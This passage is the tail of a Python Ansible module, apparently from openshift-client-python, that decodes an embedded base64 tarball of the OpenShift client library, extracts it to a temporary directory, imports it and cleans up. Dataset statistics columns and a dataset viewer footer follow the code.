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'
OPENSHIFT_CLIENT_PYTHON_TGZ = six.BytesIO(base64.b64decode(REPLACED_BY_REBUILD_MODULE))
module = AnsibleModule(
argument_spec=dict(
script=dict(required=True),
vars=dict(required=False, default={}, type='dict'),
project=dict(required=False, default=None),
timeout=dict(required=False, default=None, type='int'),
changes=dict(required=False, default=False, type='bool')
)
)
client_python_extract_dir = tempfile.mkdtemp()
module.debug('Extracting openshift-client-python module to: {}'.format(client_python_extract_dir))
try:
tf = tarfile.open(fileobj=OPENSHIFT_CLIENT_PYTHON_TGZ, mode='r:gz')
tf.extractall(client_python_extract_dir)
# Add the newly extacted directory to the python path to resolve the openshift package
sys.path.append(client_python_extract_dir)
# Import openshift as oc so that we can delete the extract directory. module.exit_ type methods
# call sys.exit, so this is our only chance to leave no trace.
import openshift as oc
shutil.rmtree(client_python_extract_dir)
main()
finally:
if os.path.exists(client_python_extract_dir):
shutil.rmtree(client_python_extract_dir)
| 699.828571
| 69,131
| 0.948164
| 2,574
| 73,482
| 27.035354
| 0.842269
| 0.002759
| 0.002414
| 0.002529
| 0.009182
| 0.008133
| 0.007156
| 0.007156
| 0.00638
| 0.00638
| 0
| 0.151477
| 0.017147
| 73,482
| 104
| 69,132
| 706.557692
| 0.812066
| 0.010193
| 0
| 0.220779
| 1
| 0.012987
| 0.954704
| 0.951417
| 0
| 1
| 0
| 0
| 0
| 1
| 0.025974
| false
| 0
| 0.181818
| 0
| 0.207792
| 0.051948
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.